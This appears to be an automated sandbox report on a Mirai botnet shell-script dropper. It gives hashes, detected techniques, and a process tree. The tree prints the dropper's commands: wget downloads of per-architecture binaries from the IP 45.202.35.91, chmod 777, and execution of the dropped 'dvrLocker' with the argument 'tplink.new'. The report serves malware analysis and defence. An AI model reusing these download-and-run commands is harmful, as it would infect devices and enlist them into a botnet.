Analysis
-
max time kernel
26s -
max time network
27s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
09-11-2024 03:32
Static task
static1
Behavioral task
behavioral1
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
-
Size
923B
-
MD5
5419b553750dc94cb55eecefce2e1950
-
SHA1
bf1c8a80bcecfe13f81279a0392031d661e736ef
-
SHA256
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
-
SHA512
fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid process
864 chmod
886 chmod
897 chmod
902 chmod
912 chmod
937 chmod
959 chmod
968 chmod
997 chmod
843 chmod
854 chmod
982 chmod
823 chmod
833 chmod
892 chmod
917 chmod
926 chmod
977 chmod
987 chmod
992 chmod
814 chmod
879 chmod
907 chmod
948 chmod
-
Executes dropped EXE 24 IoCs
Processes:
ioc pid process
/tmp/lib/dvrLocker 815 dvrLocker
/tmp/lib/dvrLocker 824 dvrLocker
/tmp/lib/dvrLocker 835 dvrLocker
/tmp/lib/dvrLocker 844 dvrLocker
/tmp/lib/dvrLocker 855 dvrLocker
/tmp/lib/dvrLocker 865 dvrLocker
/tmp/lib/dvrLocker 880 dvrLocker
/tmp/lib/dvrLocker 887 dvrLocker
/mnt/dvrLocker 893 dvrLocker
/mnt/dvrLocker 898 dvrLocker
/mnt/dvrLocker 903 dvrLocker
/mnt/dvrLocker 908 dvrLocker
/mnt/dvrLocker 913 dvrLocker
/mnt/dvrLocker 918 dvrLocker
/mnt/dvrLocker 927 dvrLocker
/mnt/dvrLocker 939 dvrLocker
/mnt/dvrLocker 950 dvrLocker
/mnt/dvrLocker 960 dvrLocker
/mnt/dvrLocker 970 dvrLocker
/mnt/dvrLocker 978 dvrLocker
/mnt/dvrLocker 983 dvrLocker
/mnt/dvrLocker 988 dvrLocker
/mnt/dvrLocker 993 dvrLocker
/mnt/dvrLocker 998 dvrLocker
-
Processes:
description ioc process
File opened for reading /proc/filesystems ls
File opened for reading /proc/filesystems mkdir
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid process
963 rm
819 wget
827 rm
896 wget
900 rm
954 wget
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc process
File opened for modification /tmp/lib/dvrLocker becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes
-
/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh1⤵
- Writes file to tmp directory
PID:709 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:711 -
/bin/lsls -l /proc/10/exe2⤵
- Reads runtime system information
PID:717 -
/bin/lsls -l /proc/109/exe2⤵
- Reads runtime system information
PID:721 -
/bin/lsls -l /proc/11/exe2⤵PID:724
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:727 -
/bin/lsls -l /proc/125/exe2⤵
- Reads runtime system information
PID:731 -
/bin/lsls -l /proc/126/exe2⤵
- Reads runtime system information
PID:734 -
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:736 -
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:738 -
/bin/lsls -l /proc/15/exe2⤵
- Reads runtime system information
PID:740 -
/bin/lsls -l /proc/155/exe2⤵
- Reads runtime system information
PID:741 -
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:743 -
/bin/lsls -l /proc/160/exe2⤵
- Reads runtime system information
PID:746 -
/bin/lsls -l /proc/17/exe2⤵
- Reads runtime system information
PID:748 -
/bin/lsls -l /proc/179/exe2⤵
- Reads runtime system information
PID:749 -
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:750 -
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:752 -
/bin/lsls -l /proc/2/exe2⤵
- Reads runtime system information
PID:753 -
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:754 -
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:755 -
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:756 -
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:757 -
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:758 -
/bin/lsls -l /proc/241/exe2⤵
- Reads runtime system information
PID:759 -
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:760 -
/bin/lsls -l /proc/328/exe2⤵
- Reads runtime system information
PID:761 -
/bin/lsls -l /proc/329/exe2⤵
- Reads runtime system information
PID:762 -
/bin/lsls -l /proc/332/exe2⤵
- Reads runtime system information
PID:763 -
/bin/lsls -l /proc/334/exe2⤵
- Reads runtime system information
PID:764 -
/bin/lsls -l /proc/36/exe2⤵
- Reads runtime system information
PID:765 -
/bin/lsls -l /proc/361/exe2⤵
- Reads runtime system information
PID:766 -
/bin/lsls -l /proc/37/exe2⤵
- Reads runtime system information
PID:767 -
/bin/lsls -l /proc/377/exe2⤵
- Reads runtime system information
PID:768 -
/bin/lsls -l /proc/380/exe2⤵PID:769
-
/bin/lsls -l /proc/385/exe2⤵
- Reads runtime system information
PID:770 -
/bin/lsls -l /proc/388/exe2⤵
- Reads runtime system information
PID:771 -
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:772 -
/bin/lsls -l /proc/434/exe2⤵
- Reads runtime system information
PID:773 -
/bin/lsls -l /proc/5/exe2⤵
- Reads runtime system information
PID:774 -
/bin/lsls -l /proc/6/exe2⤵
- Reads runtime system information
PID:775 -
/bin/lsls -l /proc/675/exe2⤵
- Reads runtime system information
PID:776 -
/bin/lsls -l /proc/678/exe2⤵
- Reads runtime system information
PID:777 -
/bin/lsls -l /proc/68/exe2⤵
- Reads runtime system information
PID:778 -
/bin/lsls -l /proc/680/exe2⤵
- Reads runtime system information
PID:779 -
/bin/lsls -l /proc/684/exe2⤵
- Reads runtime system information
PID:780 -
/bin/lsls -l /proc/685/exe2⤵
- Reads runtime system information
PID:781 -
/bin/lsls -l /proc/69/exe2⤵
- Reads runtime system information
PID:782 -
/bin/lsls -l /proc/7/exe2⤵
- Reads runtime system information
PID:783 -
/bin/lsls -l /proc/701/exe2⤵
- Reads runtime system information
PID:784 -
/bin/lsls -l /proc/702/exe2⤵
- Reads runtime system information
PID:785 -
/bin/lsls -l /proc/704/exe2⤵
- Reads runtime system information
PID:786 -
/bin/lsls -l /proc/706/exe2⤵
- Reads runtime system information
PID:787 -
/bin/lsls -l /proc/707/exe2⤵
- Reads runtime system information
PID:788 -
/bin/lsls -l /proc/708/exe2⤵
- Reads runtime system information
PID:789 -
/bin/lsls -l /proc/709/exe2⤵
- Reads runtime system information
PID:790 -
/bin/lsls -l /proc/72/exe2⤵
- Reads runtime system information
PID:791 -
/bin/lsls -l /proc/73/exe2⤵
- Reads runtime system information
PID:792 -
/bin/lsls -l /proc/74/exe2⤵PID:793
-
/bin/lsls -l /proc/75/exe2⤵
- Reads runtime system information
PID:794 -
/bin/lsls -l /proc/76/exe2⤵
- Reads runtime system information
PID:795 -
/bin/lsls -l /proc/77/exe2⤵
- Reads runtime system information
PID:796 -
/bin/lsls -l /proc/78/exe2⤵
- Reads runtime system information
PID:797 -
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:798 -
/bin/lsls -l /proc/81/exe2⤵
- Reads runtime system information
PID:799 -
/bin/lsls -l /proc/83/exe2⤵
- Reads runtime system information
PID:800 -
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:803 -
/bin/rmrm -rf /tmp/lib/2⤵PID:804
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:806
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:808 -
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:809
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:814 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:815 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:815
-
/bin/rmrm -rf tmpsl2⤵PID:817
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:819 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:823 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:824 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:824
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:827 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:829
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:833 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:835 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:835
-
/bin/rmrm -rf tarm2⤵PID:837
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:838
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:843 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:844 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:844
-
/bin/rmrm -rf tarm52⤵PID:847
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:849
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:854 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:855 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:855
-
/bin/rmrm -rf tppc2⤵PID:857
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:858
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:865 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:865
-
/bin/rmrm -rf tarm72⤵PID:868
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:870
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:879 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:880 -
/bin/rmrm -rf x862⤵PID:883
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:884
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:886 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:887 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:887
-
/bin/rmrm -rf tarm62⤵PID:889
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:890
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:891
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:892 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:893 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:893
-
/bin/rmrm -rf tmpsl2⤵PID:895
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:896 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:897 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:898 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:898
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:900 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:901
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:902 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:903 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:903
-
/bin/rmrm -rf tarm2⤵PID:905
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:906
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:907 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:908 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:908
-
/bin/rmrm -rf tarm52⤵PID:910
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:911
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:912 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:913 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:913
-
/bin/rmrm -rf tppc2⤵PID:915
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:916
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:917 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:918 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:918
-
/bin/rmrm -rf tarm72⤵PID:920
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:921
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:926 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:927 -
/bin/rmrm -rf x862⤵PID:931
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:932
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:937 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:939 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:939
-
/bin/rmrm -rf tarm62⤵PID:942
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:943
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:948 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:950 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:950
-
/bin/rmrm -rf tmpsl2⤵PID:953
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:954 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:959 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:960 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:960
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:963 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:964
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:968 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:970 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:970
-
/bin/rmrm -rf tarm2⤵PID:973
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:974
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:977 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:978 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:978
-
/bin/rmrm -rf tarm52⤵PID:980
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:981
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:982 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:983 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:983
-
/bin/rmrm -rf tppc2⤵PID:985
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:986
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:987 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:988 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:988
-
/bin/rmrm -rf tarm72⤵PID:990
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:991
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:992 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:993 -
/bin/rmrm -rf x862⤵PID:995
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:996
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:997 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:998 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:998
-
/bin/rmrm -rf tarm62⤵PID:1000
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
93KB
MD5
bb9275394716c60d1941432c7085ca13
SHA1
43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512
047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d